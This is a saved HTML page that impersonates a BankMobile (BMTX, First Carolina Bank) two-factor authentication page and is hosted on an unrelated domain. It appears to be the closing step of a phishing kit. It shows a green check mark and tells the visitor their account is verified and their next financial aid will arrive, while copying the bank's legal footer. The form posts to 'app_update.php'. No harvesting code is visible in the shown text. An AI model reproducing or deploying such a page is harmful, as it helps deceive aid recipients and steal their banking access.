<!DOCTYPE html>
<!-- saved from url=(0068)https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex">  
  
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="./2eeee_files/bootstrap.min.css" rel="stylesheet" type="text/css">
  <link href="./2eeee_files/outpages_index.css" rel="stylesheet" type="text/css">
  <link href="./2eeee_files/global.css" rel="stylesheet" type="text/css">
  <link rel="shortcut icon" href="https://eftcentral.es/vibeaccounts/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="./2eeee_files/2FAuthentication.css">
  <title>Two Factor Authentication</title>
</head>
<body>
  <div id="homepage-wrapper">
      <div class="col-xs-12" id="resp-outheader">
        <div class="hdr-logo-padding">
            <a href="https://eftcentral.es/"><img src="./2eeee_files/title_1.gif" height="68" alt="" style="visibility: hidden;"></a>
        </div>
        <div class="row" id="login-row" style="height: 60px;">
            <form id="loginForm" action="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php" method="post" style="display: inline" autocomplete="off">
                <div class="col-xs-12 col-md-offset-0">
                    <div class="row">
                        <div class="login-fields">
                        </div>
                        <div class="login-padding login-button-group">
                           
                        </div>
                    </div>
                </div>
            </form>
        </div>
      </div>
      <div class="pagebody_div factor2Pt">
        <div class="pagecontent_div factor2Content">
          <form name="twoFactorAuthenticationForm" method="post" action="app_update.php" id="twoFactorAuthenticationForm" novalidate="novalidate">
            <div class="container">
              <div class="row">
                <div class="icon col-xs-12 col-sm-4 col-md-3">
                  <div class="image">
     
        
                  </div>
                </div>
          <br>
          <br>
          <br>
          <br>
          <br>
          <br>
          <br>
          <br>
<style>
  .check-icon {
    width: 60px;
    height: 60px;
    background-color: #4CAF50;
    border-radius: 50%;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20px; /* Adds space between the icon and the text */
  }

  .check-icon::before {
    content: '\2713'; /* Unicode checkmark */
    font-size: 40px;
    color: white;
  }
</style>

<center>
  <div class="check-icon"></div>
  <h3>
    <p>You have successfully verified your account and you will receive your next financial aid when the time is due.</p>
  </h3>
  <p>
  A customer representative might reach out. Close browser.</p>
</center>
       </h3>
                </div>
              </div>
                 <div class="row messages">
   
    <div style="text-align:center"><br>
        <p>
   

                </div>
               </div>
              <div class="clearfix"></div>
            </div>
            <div class="clearfix"></div> 
          </form>
          <div style="clear:both"></div>
        </div>
      <div class="ftr_bar_wide"></div>
      <div id="footer-footer">
        <div class="footertext">
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Home</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#" target="security">Security</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Fee Schedules</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Terms and Conditions</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Privacy Statement</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Privacy Notice for California Residents</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#">Contact Us</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#" target="EasyHelp" rel="external">Identity Verification</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/2FAuthentication.php#" target="EasyHelp" rel="external">FAQs</a>
        </div>
        <div class="footertext footer_legaltext">
            <p><img src="./2eeee_files/fdic-housing.png" alt="BMTX, Inc.&gt;" class="fdic-logo"></p>

            © 2024 BMTX, Inc., a wholly owned subsidiary of BM Technologies, Inc. All Rights Reserved.<br>


            <br> Digital banking platform powered by BMTX, Inc. BankMobile banking products and banking services are provided by First Carolina Bank, Member FDIC &amp; Equal Housing Lender. The BankMobile Debit Mastercard® card is issued by First
            Carolina Bank pursuant to license from Mastercard International Incorporated. The card is administered by First Carolina Bank. Mastercard and the Mastercard brand mark are registered trademarks of Mastercard International Incorporated.
            All other names and logos are owned by their respective owners.<br>


            <br> BM Technologies, Inc., PO Box 278, Maple Shade, NJ 08052
        </div>
      </div>
  </div>

  <script>
 

</div></body></html>